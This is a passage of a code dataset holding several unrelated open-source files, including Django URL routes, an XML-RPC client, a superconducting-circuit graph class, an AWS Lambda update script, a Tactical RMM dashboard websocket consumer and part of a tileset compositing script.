'md-previous.png'))\n\n\napp.go()\n","repo_name":"quasarbright/quasarbright.github.io","sub_path":"python/mp3/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19449903592","text":"from django.urls import path\nfrom . import views\n\napp_name = 'blog'\n\nurlpatterns = [\n path('', views.all_blogs, name='all_blogs'),\n path('/', views.detail, name='detail'),\n # pokud da nekdo do adresy int, posli tento int pod nazvem blog_id do views.all_blog\n]\n","repo_name":"novotj88/django3-personal-portfolio","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31375903004","text":"#!/usr/bin/python\n# coding=utf8\n\nimport xmlrpc.client\nfrom xmlrpc.client import ServerProxy\n\n__author__ = 'Jam'\n__date__ = '2019/6/26 18:07'\n\nif __name__ == '__main__':\n server = ServerProxy(\"http://localhost:8888\", allow_none=True)\n print (server.get_string(\"cloudox\"))\n print (server.add(8, 8))\n\n # 上传文件\n put_handle = open(\"./tmp/pd_figure_0.png\", 'rb')\n server.image_put(xmlrpc.client.Binary(put_handle.read()))\n put_handle.close()\n\n # 下载文件\n get_handle = open(\"./tmp/test.png\", 'wb')\n get_handle.write(server.image_get().data)\n get_handle.close()\n","repo_name":"ls1248659692/python_guide","sub_path":"data_analysis_tutorial/rpc_client.py","file_name":"rpc_client.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"48"} +{"seq_id":"31012586145","text":"import networkx as nx\nimport graphviz as gv\nimport pydot as pd\nimport platform\n\n# FIXME: Make this more intelligent\nif platform.system() == 'Windows':\n import os\n os.environ[\"PATH\"] += os.pathsep + 'C:/Program Files/Graphviz/bin/'\n\nclass CircuitGraph:\n \n # Prefixes for the circuit elements\n _element_prefixes = [\n \"C\", # Capacitor\n \"L\", # Inductor\n \"I\", # Josephson junction\n \"V\", # Phase-slip nanowire\n \"M\" # Mutual inductance\n ]\n \n _resonator_prefixes = [\n \"f\", # Resonant frequency\n \"Z\", # Resonator impedance\n \"g\" # Coupling term\n ]\n \n # Different subgraphs\n _subgraphs = [\n \"Circuit\",\n \"Conductive\",\n \"SCTree\",\n \"SCGraph\",\n \"Loop\"\n ]\n \n def __init__(self, circuit_name=\"\"):\n \"\"\"\n \"\"\"\n \n # Components associated with each branch\n self.components_map = {}\n \n # Charge bias associated with node\n self.charge_bias_nodes = {}\n \n # Flux bias associated with each loop\n self.flux_bias_edges = {}\n \n # All circuit loops map\n self.loops_map = {}\n \n # Edges shared between loops\n self.loop_adjacency_map = {}\n \n # Capacitively-coupled resonators\n self.resonators_cap = {}\n \n # Mutually coupled branches\n self.coupled_branches = {}\n \n # General undirected circuit graph\n self.circuit_graph = nx.MultiGraph(circuit_name=circuit_name)\n \n def addBranch(self, n1, n2, component):\n \"\"\"\n \"\"\"\n \n # Check there are no mutual inductors specified\n if component[0] == self._element_prefixes[4]:\n raise Exception(\"Cannot add a mutual inductance to a circuit branch.\")\n \n # Check the symbol is correct\n if component[0] not in self._element_prefixes:\n raise Exception(\"Invalid component symbol '%s', it should be one of %s.\" % (component[0], repr(self._element_prefixes)))\n \n # Add the branch\n k = self.circuit_graph.add_edge(n1, n2, component=component, label=component)\n \n # Update\n self._update_components_map()\n self._update_graphs()\n self._update_couplings_map((n1, n2, k))\n \n def coupleBranchesInductively(self, edge1, edge2, component):\n \"\"\"\n \"\"\"\n alt_edge1 = (edge1[1], edge1[0], edge1[2])\n alt_edge2 = (edge2[1], edge2[0], edge2[2])\n \n if edge1 not in self.sc_spanning_tree_wc.edges and alt_edge1 not in self.sc_spanning_tree_wc.edges:\n raise Exception(\"Edge %s is not in conductive circuit subgraph.\" % repr(edge1))\n if edge2 not in self.sc_spanning_tree_wc.edges and alt_edge2 not in self.sc_spanning_tree_wc.edges:\n raise Exception(\"Edge %s is not in conductive circuit subgraph.\" % repr(edge2))\n \n edge1 = alt_edge1 if edge1 not in self.sc_spanning_tree_wc.edges else edge1\n edge2 = alt_edge2 if edge2 not in self.sc_spanning_tree_wc.edges else edge2\n \n # Check the edges are inductive\n if self.isInductiveEdge(edge1) == False:\n raise Exception(\"The selected edge %s is not inductive.\" % repr(edge1))\n if self.isInductiveEdge(edge2) == False:\n raise Exception(\"The selected edge %s is not inductive.\" % repr(edge2))\n \n # Ensure component is a mutual inductance\n if component[0] != self._element_prefixes[4]:\n raise Exception(\"Branch coupling component must be a mutual inductance.\")\n \n self.coupled_branches[component] = (edge1, edge2)\n \n def coupleResonatorCapacitively(self, node, component):\n \"\"\"\n \"\"\"\n if node not in self.circuit_graph.nodes:\n raise Exception(\"Node %i not part of the circuit graph.\" % node)\n \n if node == 0:\n raise Exception(\"Cannot couple a resonator to the ground node of the circuit\")\n \n if self.resonators_cap[node] is not None:\n raise Exception(\"Node %i already has a resonator coupled to it (only one per node supported currently).\" % node)\n \n # Check there are no mutual inductors specified\n if component[0] != self._element_prefixes[0]:\n raise Exception(\"The resonator coupling element must be a capacitor.\")\n \n # Detect duplicates\n if component in self.components_map.values():\n raise Exception(\"Component %s already exists. Change the name of the component.\" % component)\n \n # Create the resonator capacitor and inductor symbols\n Cr = \"%s%ir\" % (self._element_prefixes[0], node)\n Lr = \"%s%ir\" % (self._element_prefixes[1], node)\n \n # Create the resonator frequency and impedance symbols\n fr = \"%s%ir\" % (self._resonator_prefixes[0], node) # This is the bare frequency\n Zr = \"%s%ir\" % (self._resonator_prefixes[1], node)\n \n # Create the Hamiltonian coupling term symbols\n gC = \"%s%ir\" % (self._resonator_prefixes[2], node)\n \n # Create the loaded resonator and impedance symbols\n frd = \"%s%irl\" % (self._resonator_prefixes[0], node)\n Zrd = \"%s%irl\" % (self._resonator_prefixes[1], node)\n \n self.resonators_cap[node] = {\n \"coupling\": component,\n \"fr\": fr,\n \"Zr\": Zr,\n \"Cr\": Cr,\n \"Lr\": Lr,\n \"gC\": gC,\n \"frl\": frd,\n \"Zrl\": Zrd\n }\n \n def removeAllResonators(self):\n \"\"\"\n \"\"\"\n for node in self.circuit_graph.nodes:\n self.resonators_cap[node] = None\n \n def coupleResonatorInductively(self, edge, component, frequency, impedance=50.0):\n \"\"\"\n \"\"\"\n pass\n \n def addFluxBias(self, edge, component, source_inductance=None):\n \"\"\"\n \"\"\"\n alt_edge = (edge[1], edge[0], edge[2])\n if edge not in self.sc_spanning_tree_wc.edges and alt_edge not in self.sc_spanning_tree_wc.edges:\n raise Exception(\"Edge %s is not in conductive circuit subgraph.\" % repr(edge))\n edge = alt_edge if edge not in self.sc_spanning_tree_wc.edges else edge\n \n # Ensure component is a mutual inductance\n if component[0] != self._element_prefixes[4]:\n raise Exception(\"Flux bias coupling component must be a mutual inductance.\")\n \n # Detect duplicates\n if component in self.components_map.values():\n raise Exception(\"Component %s already exists. Change the name of the component.\" % component)\n \n # Check the edge has an inductor\n if self.isInductiveEdge(edge) == False:\n raise Exception(\"The selected edge %s is not inductive.\" % repr(edge))\n \n # Save it\n self.flux_bias_edges[edge] = component\n \n # FIXME: For now we assume the source inductance is the same as the in-circuit inductance.\n \n def addChargeBias(self, node, component):\n \"\"\"\n \"\"\"\n if node not in self.circuit_graph.nodes:\n raise Exception(\"Node %i not part of the circuit graph.\" % node)\n \n # Ensure component is a capacitor\n if component[0] != self._element_prefixes[0]:\n raise Exception(\"Charge bias coupling component must be a capacitor.\")\n \n # Detect duplicates\n if component in self.components_map.values():\n raise Exception(\"Component %s already exists. Change the name of the component.\" % component)\n \n self.charge_bias_nodes[node] = component\n \n def isCapacitiveEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[0]:\n return True\n return False\n \n def isInductiveEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[1]:\n return True\n return False\n \n def isJosephsonEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[2]:\n return True\n return False\n \n def isPhaseSlipEdge(self, edge):\n cstr = self.components_map[edge]\n if cstr[0] == self._element_prefixes[3]:\n return True\n return False\n \n def getCapacitiveEdges(self):\n edges_map = {v: k for k, v in self.components_map.items()}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[0]:\n ret[c] = edge\n return ret\n \n def getInductiveEdges(self):\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[1]:\n ret[c] = edge\n return ret\n \n def getJosephsonEdges(self):\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[2]:\n ret[c] = edge\n return ret\n \n def getPhaseSlipEdges(self):\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n ret = {}\n for c, edge in edges_map.items():\n if c[0] == self._element_prefixes[3]:\n ret[c] = edge\n return ret\n \n def getComponentEdge(self, component):\n if component not in self.components_map.values():\n raise Exception(\"Component %s does not exist.\" % component)\n \n # Capacitive edges are not directional\n if component[0] == self._element_prefixes[0]:\n edges_map = {v: k for k, v in self.components_map.items()}\n return edges_map[component]\n \n # Other edges are directional\n edges_map = {self.components_map[k]: k for k in self.sc_spanning_tree_wc.edges}\n return edges_map[component]\n \n def getLoopsFromClosureBranch(self, edge):\n if edge not in self.closure_branches:\n raise Exception(\"Edge %s not a closure branch.\" % repr(edge))\n \n loop_keys = []\n for key, loop_edges in self.sc_loops.items():\n if edge in loop_edges:\n loop_keys.append(key)\n return loop_keys\n \n def getEdgesSharedWithLoop(self, loop_key):\n if loop_key not in self.sc_loops.keys():\n raise Exception(\"No loop key %i available.\" % loop_key)\n \n # Get the loops connected to this loop and save their edges\n loop_edges = set(self.sc_loops[loop_key])\n edges = set(self.sc_loops[loop_key])\n for key, loop in self.sc_loops.items():\n if key == loop_key:\n continue\n \n if not loop_edges.isdisjoint(set(loop)):\n edges |= set(loop)\n return edges\n \n #\n # DRAWING\n #\n \n def drawGraphViz(self, graph='Circuit', filename=None, format='svg'):\n if graph not in self._subgraphs:\n raise Exception(\"Invalid subgraph type '%s'.\" % graph)\n \n if graph == \"Circuit\":\n G = self.circuit_graph\n elif graph == \"Conductive\":\n G = self.circuit_conductive_graph\n elif graph == \"SCTree\":\n G = self.sc_spanning_tree\n elif graph == \"SCGraph\":\n G = self.sc_spanning_tree_wc\n elif graph == \"Loop\":\n G = self.loop_graph\n \n # Get the pydot graph\n pd_graph = nx.nx_pydot.to_pydot(G)\n \n # Compile the graphviz source\n gv_graph = gv.Source(pd_graph.create(format='dot').decode('utf8'))\n \n # Return the object, which should be rendered in a jupyter notebook\n if filename is None:\n return gv_graph\n \n # Save to file in specified format\n \n #\n # INTERNAL\n #\n def _update_graphs(self):\n self._get_conductive_graph()\n self._get_virtual_grounds()\n self._get_spanning_tree()\n self._get_sc_circuit()\n self._get_sc_loops()\n self._get_closure_branches()\n self._get_loop_graph()\n \n def _update_components_map(self):\n # Get all components keyed by edge\n self.components_map = nx.get_edge_attributes(self.circuit_graph, \"component\")\n \n # Detect duplicates\n tmp = list(set(self.components_map.values()))\n if len(tmp) != len(self.components_map.values()):\n raise Exception(\"Duplicate component detected. Change the name of the component.\")\n \n # Reverse the keys for convenience, use more memory rather than complicating later code\n tmp = {}\n for k, v in self.components_map.items():\n tmp[(k[1], k[0], k[2])] = v\n self.components_map.update(tmp)\n \n def _update_couplings_map(self, edge):\n n1, n2, k = edge\n if n1 not in self.charge_bias_nodes.keys():\n self.charge_bias_nodes[n1] = None\n if n2 not in self.charge_bias_nodes.keys():\n self.charge_bias_nodes[n2] = None\n if (n1, n2, k) not in self.flux_bias_edges.keys():\n self.flux_bias_edges[(n1, n2, k)] = None\n if (n2, n1, k) not in self.flux_bias_edges.keys():\n self.flux_bias_edges[(n2, n1, k)] = None\n if n1 not in self.resonators_cap.keys():\n self.resonators_cap[n1] = None\n if n2 not in self.resonators_cap.keys():\n self.resonators_cap[n2] = None\n \n def _get_conductive_graph(self):\n labels = nx.get_edge_attributes(self.circuit_graph, \"label\")\n self.circuit_conductive_graph = nx.MultiGraph()\n \n # Add all nodes\n self.circuit_conductive_graph.add_nodes_from(self.circuit_graph.nodes)\n \n # Ignore edges containing only capacitors\n for edge, component in nx.get_edge_attributes(self.circuit_graph, \"component\").items():\n if component[0] == self._element_prefixes[0]:\n continue\n self.circuit_conductive_graph.add_edge(edge[0], edge[1], key=edge[2],\n component=component, label=labels[edge])\n \n def _get_virtual_grounds(self):\n labels = nx.get_edge_attributes(self.circuit_conductive_graph, \"label\")\n # Get connected graphs\n connected = [self.circuit_conductive_graph.subgraph(c).copy()\\\n for c in nx.connected_components(self.circuit_conductive_graph)]\n \n # Get virtual grounds\n self.virtual_grounds = {}\n for subG in connected:\n \n # If only one node, it is a virtual ground\n if len(subG.nodes) == 1:\n n = list(subG.nodes)[0]\n S = nx.MultiDiGraph()\n S.add_node(n)\n self.virtual_grounds[n] = ([], S)\n \n # Get spanning tree of subgraph\n G = nx.minimum_spanning_tree(subG)\n\n # Construct the spanning tree part of the sub\n S = nx.MultiDiGraph()\n for edge in G.edges:\n S.add_edge(edge[0], edge[1], key=edge[2], edge_type=\"S\", label=labels[edge])\n\n # Get closure branches, i.e. those that do not appear in the spanning tree\n closure_edges = list(set(subG.edges) - set(S.edges))\n for i, edge in enumerate(closure_edges):\n closure_edges[i] = (edge[1], edge[0], edge[2]) # reverse edge to preserve flow order\n\n # Find nodes with 0 in_degree\n for n, d in S.in_degree:\n if d == 0:\n self.virtual_grounds[n] = (closure_edges, S)\n break\n \n def _get_spanning_tree(self):\n S = nx.union_all([S for c, S in self.virtual_grounds.values()])\n labels = nx.get_edge_attributes(self.circuit_conductive_graph, \"label\")\n \n # As the node order may have been changed, reconstruct the graph\n self.sc_spanning_tree = nx.MultiDiGraph()\n self.sc_spanning_tree.add_nodes_from(self.circuit_conductive_graph.nodes)\n for edge in S.edges:\n self.sc_spanning_tree.add_edge(edge[0], edge[1], key=edge[2], edge_type=\"S\", label=labels[edge])\n \n def _get_sc_circuit(self):\n labels = nx.get_edge_attributes(self.circuit_conductive_graph, \"label\")\n self.sc_spanning_tree_wc = self.sc_spanning_tree.copy()\n for c, S in self.virtual_grounds.values():\n for edge in c:\n edger = (edge[1], edge[0], edge[2])\n label = labels[edger] if edge not in labels.keys() else labels[edge]\n self.sc_spanning_tree_wc.add_edge(edge[0], edge[1], key=edge[2], edge_type=\"C\", label=label)\n \n def _get_sc_loops(self):\n c = 0\n self.sc_loops = {}\n for source_node, spanning in self.virtual_grounds.items():\n closure_edges, S = spanning\n\n for edge in closure_edges:\n self.sc_loops[c] = []\n try:\n p1 = sorted(nx.all_simple_edge_paths(S, source_node, edge[0]))[0]\n p2 = sorted(nx.all_simple_edge_paths(S, source_node, edge[1]))[0]\n self.sc_loops[c].extend(list(set(p1)^set(p2)))\n except IndexError:\n self.sc_loops[c].extend(list(p1))\n\n self.sc_loops[c].append(edge)\n c+=1\n \n def _get_closure_branches(self):\n self.closure_branches = []\n for closure_edges, S in self.virtual_grounds.values():\n self.closure_branches.extend(closure_edges)\n \n def _get_loop_graph(self):\n loop_graph_nodes = {}\n loop_graph_edges = {}\n multi_edges = set()\n counter = 0\n\n # Find the 2-node loops\n counter_dict = {}\n loop_c = 0\n for edge in self.circuit_graph.edges:\n key = (edge[0], edge[1])\n if key in counter_dict.keys():\n counter_dict[key].append(edge)\n else:\n counter_dict[key] = [edge]\n duplicates_dict = {k: v for k, v in counter_dict.items() if len(v) > 1}\n loop_graph_nodes = {}\n counter = 0\n \n for k, v in duplicates_dict.items():\n for i in range(len(v)-1):\n loop_graph_nodes[counter] = [v[i], v[i+1]]\n counter += 1\n\n # Keep a set of multi-edges\n multi_edges.update(v)\n \n # Reduce multigraph to simple graph by removing edge duplicates\n G = nx.Graph()\n G.add_edges_from(list(set([(e[0],e[1]) for e in self.circuit_graph.edges])))\n\n # Update the loops data with longer-node loops\n multi_edges_used = set()\n #for cycle in nx.minimum_cycle_basis(G):\n for cycle in nx.cycle_basis(G): # FIXME: This preserves node order but doesn't use minimum weight cycles.\n \n # Last edge nodes are reversed to preserve ordering of multigraph\n edges = [(cycle[i], cycle[i+1], 0) if i < len(cycle)-1 else (cycle[(i+1)%len(cycle)], cycle[i], 0) for i in range(len(cycle))]\n \n # Sort the edge nodes\n edges = [(e[0], e[1], e[2]) if e[0] < e[1] else (e[1], e[0], e[2]) for e in edges]\n\n # Check if a multi-edge has already appeared\n for i, edge in enumerate(edges):\n if edge in multi_edges_used:\n # Increment the multi-edge index\n edges[i] = (edge[0], edge[1], edge[2]+1)\n else:\n # Add the edge to the list if it's a multi-edge\n if edge in multi_edges:\n multi_edges_used.add(edge)\n multi_edges.remove(edge)\n\n loop_graph_nodes[counter] = edges\n counter += 1\n\n # Now find the edges in common between loops\n # Exploits the ordering of nodes in multigraph edges\n for i in range(counter-1):\n for j in range(i+1, counter, 1):\n l1 = loop_graph_nodes[i]\n l2 = loop_graph_nodes[j]\n\n edges = []\n for k in l1:\n if k in l2:\n edges.append(k)\n if len(edges) > 0:\n loop_graph_edges[(i, j)] = edges\n\n # Remove the edges in common between loops from the node attributes\n #for ke, ve in loop_graph_edges.items():\n # for v in ve:\n # loop_graph_nodes[ke[0]].remove(v)\n # loop_graph_nodes[ke[1]].remove(v)\n \n # Save the loop data\n self.loops_map = loop_graph_nodes\n self.loop_adjacency_map = loop_graph_edges\n \n # Create the loop graph\n self.loop_graph = nx.Graph()\n for k, v in loop_graph_nodes.items():\n self.loop_graph.add_node(k, circuit_edges=v)\n\n for k, v in loop_graph_edges.items():\n self.loop_graph.add_edge(k[0], k[1], circuit_edges=v)\n \n","repo_name":"Paul-Warburton-Research-Group/pycqed","sub_path":"src/pycqed/circuit_graph.py","file_name":"circuit_graph.py","file_ext":"py","file_size_in_byte":21139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71392661586","text":"import subprocess\r\nimport os\r\nimport importlib.util\r\nimport time\r\nimport handler\r\n\r\n#Update Lambda Function\r\n\r\n\r\nclass Script():\r\n\r\n #TO DO ''\r\n\r\n rootScripts = handler.find_root_dir()\r\n defaultLambdaName = os.path.basename(rootScripts)\r\n defaultKeyName = defaultLambdaName + '.zip'\r\n defaultZipFile = rootScripts + '/' + defaultKeyName\r\n defaultBucketName = \"lambda-functions-kolserdav\"\r\n defaultPublish = 'y'\r\n zipFile = ''\r\n publish = ''\r\n nameLambda = ''\r\n bucketName = ''\r\n keyName = ''\r\n result = ''\r\n\r\n def script(self):\r\n self.nameLambda = input('Lambda function name: <' + self.defaultLambdaName + '>: ')\r\n if self.defaultLambdaName.index('.'):\r\n self.defaultLambdaName = self.defaultLambdaName.replace('.', '-')\r\n self.zipFile = input('Zip file <' + self.defaultZipFile + '>: ')\r\n self.publish = input('Publish function <' + self.defaultPublish + '>: ')\r\n self.bucketName = input(\"S3Bucket Lambda code name <\" + self.defaultBucketName + \">: \")\r\n self.keyName = input(\"S3Bucket Lambda code key <\" + self.defaultKeyName + \">: \")\r\n if self.nameLambda == '':\r\n self.nameLambda = self.defaultLambdaName\r\n if self.zipFile == '':\r\n self.zipFile = self.defaultZipFile\r\n self.result = 's3'\r\n if self.defaultPublish == '':\r\n self.publish = self.defaultPublish\r\n if self.publish.lower() == 'y':\r\n self.publish = '--publish'\r\n else:\r\n self.publish = '--no-publish'\r\n if self.bucketName == '':\r\n self.bucketName = self.defaultBucketName\r\n if self.keyName == '':\r\n self.keyName = self.defaultKeyName\r\n bucket_request = \"aws s3api put-object --acl private --bucket \" + self.bucketName + ' --key ' + \\\r\n self.nameLambda + '.zip' + ' --body ' + self.zipFile\r\n if not subprocess.check_output(bucket_request, shell=True):\r\n return print('Main bucket no get bucket request from subprocess check output [Error}: 010')\r\n call_body_zip = 'aws lambda update-function-code --function-name ' + self.nameLambda + ' --zip-file ' + self.zipFile + \\\r\n ' ' + self.publish\r\n call_body_s3 = 'aws lambda update-function-code --function-name ' + self.nameLambda + ' --s3-bucket ' + self.bucketName + \\\r\n ' --s3-key ' + self.keyName + ' ' + self.publish\r\n if self.result == 's3':\r\n result = subprocess.call(call_body_s3, shell=True)\r\n else:\r\n result = subprocess.call(call_body_zip, shell=True)\r\n\r\n return 0\r\n\r\n\r\n","repo_name":"kolserdav/aws-cli-lambda-scripts","sub_path":"update-lambda/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39610213437","text":"import asyncio\nfrom contextlib import suppress\n\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db.models import F\nfrom django.utils import timezone as djangotime\n\nfrom agents.models import Agent\nfrom tacticalrmm.constants import AgentMonType\nfrom tacticalrmm.helpers import days_until_cert_expires\n\n\nclass DashInfo(AsyncJsonWebsocketConsumer):\n async def connect(self):\n self.user = self.scope[\"user\"]\n\n if isinstance(self.user, AnonymousUser):\n await self.close()\n\n await self.accept()\n self.connected = True\n self.dash_info = asyncio.create_task(self.send_dash_info())\n\n async def disconnect(self, close_code):\n with suppress(Exception):\n self.dash_info.cancel()\n\n self.connected = False\n\n async def receive_json(self, payload, **kwargs):\n pass\n\n @database_sync_to_async\n def get_dashboard_info(self):\n total_server_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.SERVER)\n .count()\n )\n offline_server_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.SERVER)\n .filter(\n last_seen__lt=djangotime.now()\n - (djangotime.timedelta(minutes=1) * F(\"offline_time\"))\n )\n .count()\n )\n total_workstation_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.WORKSTATION)\n .count()\n )\n offline_workstation_agents_count = (\n Agent.objects.filter_by_role(self.user)\n .filter(monitoring_type=AgentMonType.WORKSTATION)\n .filter(\n last_seen__lt=djangotime.now()\n - (djangotime.timedelta(minutes=1) * F(\"offline_time\"))\n )\n .count()\n )\n\n return {\n \"total_server_offline_count\": offline_server_agents_count,\n \"total_workstation_offline_count\": offline_workstation_agents_count,\n \"total_server_count\": total_server_agents_count,\n \"total_workstation_count\": total_workstation_agents_count,\n \"days_until_cert_expires\": days_until_cert_expires(),\n }\n\n async def send_dash_info(self):\n while self.connected:\n c = await self.get_dashboard_info()\n await self.send_json(c)\n await asyncio.sleep(30)\n","repo_name":"amidaware/tacticalrmm","sub_path":"api/tacticalrmm/core/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":2312,"dataset":"github-code","pt":"48"} +{"seq_id":"7975821650","text":"#!/usr/bin/env python3\n\n# compose.py\n# Split a gfx directory made of 1000s of little images and files\n# into a set of tilesheets and a tile_config.json\n\n\"\"\"Merge all individal tile_entries and pngs in a tileset's directory\ninto a tile_config.json and 1 or more tilesheet pngs.\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport subprocess\nimport sys\n\ntry:\n import pyvips\n Vips = pyvips\nexcept ImportError:\n import gi\n gi.require_version('Vips', '8.0')\n from gi.repository import Vips\n\nFALLBACK = {\n \"file\": \"fallback.png\",\n \"tiles\": [],\n \"ascii\": [\n {\"offset\": 0, \"bold\": False, \"color\": \"BLACK\"},\n {\"offset\": 256, \"bold\": True, \"color\": \"WHITE\"},\n {\"offset\": 512, \"bold\": False, \"color\": \"WHITE\"},\n {\"offset\": 768, \"bold\": True, \"color\": \"BLACK\"},\n {\"offset\": 1024, \"bold\": False, \"color\": \"RED\"},\n {\"offset\": 1280, \"bold\": False, \"color\": \"GREEN\"},\n {\"offset\": 1536, \"bold\": False, \"color\": \"BLUE\"},\n {\"offset\": 1792, \"bold\": False, \"color\": \"CYAN\"},\n {\"offset\": 2048, \"bold\": False, \"color\": \"MAGENTA\"},\n {\"offset\": 2304, \"bold\": False, \"color\": \"YELLOW\"},\n {\"offset\": 2560, \"bold\": True, \"color\": \"RED\"},\n {\"offset\": 2816, \"bold\": True, \"color\": \"GREEN\"},\n {\"offset\": 3072, \"bold\": True, \"color\": \"BLUE\"},\n {\"offset\": 3328, \"bold\": True, \"color\": \"CYAN\"},\n {\"offset\": 3584, \"bold\": True, \"color\": \"MAGENTA\"},\n {\"offset\": 3840, \"bold\": True, \"color\": \"YELLOW\"}\n ]\n}\n\nERROR_LOGGED = False\n\n\ndef write_to_json(pathname, data):\n with open(pathname, \"w\") as fp:\n json.dump(data, fp)\n\n json_formatter = \"./tools/format/json_formatter.cgi\"\n if os.path.isfile(json_formatter):\n cmd = [json_formatter, pathname]\n subprocess.call(cmd)\n\n\ndef find_or_make_dir(pathname):\n try:\n os.stat(pathname)\n except OSError:\n os.mkdir(pathname)\n\n\nclass PngRefs(object):\n '''\n Sprites handling and referenced images memory\n '''\n def __init__(self, source_dir, output_dir):\n # dict of pngnames to png numbers; used to control uniqueness\n self.pngname_to_pngnum = {\"null_image\": 0}\n # dict of png absolute numbers to png names\n self.pngnum_to_pngname = {0: \"null_image\"}\n self.pngnum = 0\n self.referenced_pngnames = []\n self.source_dir = source_dir\n self.output_dir = output_dir\n\n if not os.access(self.source_dir, os.R_OK) \\\n or not os.path.isdir(self.source_dir):\n sys.exit(f'Error: cannot open directory {self.source_dir}')\n\n self.processed_ids = []\n tileset_info_path = os.path.join(self.source_dir, 'tile_info.json')\n self.tileset_width = 16\n self.tileset_height = 16\n self.tileset_info = [{}]\n if not os.access(tileset_info_path, os.R_OK):\n sys.exit(f'Error: cannot open {tileset_info_path}')\n with open(tileset_info_path, \"r\") as fp:\n self.tileset_info = json.load(fp)\n self.tileset_width = self.tileset_info[0].get(\"width\")\n self.tileset_height = self.tileset_info[0].get(\"height\")\n\n def convert_a_pngname_to_pngnum(self, sprite_id, entry):\n if sprite_id and sprite_id != \"no_entry\":\n new_id = self.pngname_to_pngnum.get(sprite_id, 0)\n if new_id:\n entry.append(new_id)\n if sprite_id not in self.referenced_pngnames:\n self.referenced_pngnames.append(sprite_id)\n return True\n else:\n print(\"Error: sprite id '{}'\".format(sprite_id) +\n \" has no matching PNG file.\"\n \" It will not be added to tile_config.json\")\n global ERROR_LOGGED\n ERROR_LOGGED = True\n return False\n\n def convert_pngname_to_pngnum(self, index):\n new_index = []\n if isinstance(index, list):\n for pngname in index:\n if isinstance(pngname, dict):\n sprite_ids = pngname.get(\"sprite\")\n valid = False\n new_sprites = []\n if isinstance(sprite_ids, list):\n new_sprites = []\n for sprite_id in sprite_ids:\n valid |= self.convert_a_pngname_to_pngnum(\n sprite_id, new_sprites)\n pngname[\"sprite\"] = new_sprites\n else:\n valid = self.convert_a_pngname_to_pngnum(\n sprite_ids, new_sprites)\n if valid:\n pngname[\"sprite\"] = new_sprites[0]\n if valid:\n new_index.append(pngname)\n else:\n self.convert_a_pngname_to_pngnum(pngname, new_index)\n else:\n self.convert_a_pngname_to_pngnum(index, new_index)\n if new_index and len(new_index) == 1:\n return new_index[0]\n return new_index\n\n def convert_tile_entry(self, tile_entry, prefix, is_filler):\n '''\n Compile input JSON into objects for the output JSON config\n '''\n tile_id = tile_entry.get(\"id\")\n id_as_prefix = None\n if tile_id:\n if not isinstance(tile_id, list):\n tile_id = [tile_id]\n id_as_prefix = tile_id[0] + \"_\"\n\n if is_filler:\n for an_id in tile_id:\n full_id = prefix + an_id\n if full_id in self.processed_ids:\n print(\"Info: skipping filler for {}\".format(full_id))\n return None\n fg_id = tile_entry.get(\"fg\")\n if fg_id:\n tile_entry[\"fg\"] = self.convert_pngname_to_pngnum(fg_id)\n else:\n del tile_entry[\"fg\"]\n\n bg_id = tile_entry.get(\"bg\")\n if bg_id:\n tile_entry[\"bg\"] = self.convert_pngname_to_pngnum(bg_id)\n else:\n try:\n del tile_entry[\"bg\"]\n except Exception:\n print(\"Error: Cannot find bg\" +\n \" for tile with id {}\".format(tile_id))\n global ERROR_LOGGED\n ERROR_LOGGED = True\n\n add_tile_entrys = tile_entry.get(\"additional_tiles\", [])\n for add_tile_entry in add_tile_entrys:\n self.convert_tile_entry(add_tile_entry, id_as_prefix, is_filler)\n\n if fg_id or bg_id:\n for an_id in tile_id:\n full_id = prefix + an_id\n if full_id not in self.processed_ids:\n self.processed_ids.append(full_id)\n return tile_entry\n return None # TODO: option to warn\n\n def find_unused(self, use_all=False):\n '''\n Find unused images and either warn about them or return the list\n '''\n unused = dict()\n for pngname, pngnum in self.pngname_to_pngnum.items():\n if pngnum and pngname not in self.referenced_pngnames:\n if use_all:\n unused[pngname] = pngnum\n else:\n print(\n \"Warning: image filename '{}' index '{}' was not used \"\n \"in any tile_config.json entries\"\n .format(pngname, pngnum))\n return unused\n\n\nclass TilesheetData(object):\n '''\n Tilesheet reading and compositing\n '''\n def __init__(self, subdir_index, refs):\n ts_all = refs.tileset_info[subdir_index]\n self.ts_specs = {}\n for ts_name, ts_spec in ts_all.items():\n self.ts_specs = ts_spec\n self.ts_name = ts_name\n break\n self.output = os.path.join(refs.output_dir, self.ts_name)\n self.tile_entries = []\n self.row_num = 0\n self.width = self.ts_specs.get(\"sprite_width\", refs.tileset_width)\n self.height = self.ts_specs.get(\"sprite_height\", refs.tileset_height)\n self.offset_x = 0\n self.offset_y = 0\n subdir_name = (\n self.ts_name.split(\".png\")[0] +\n 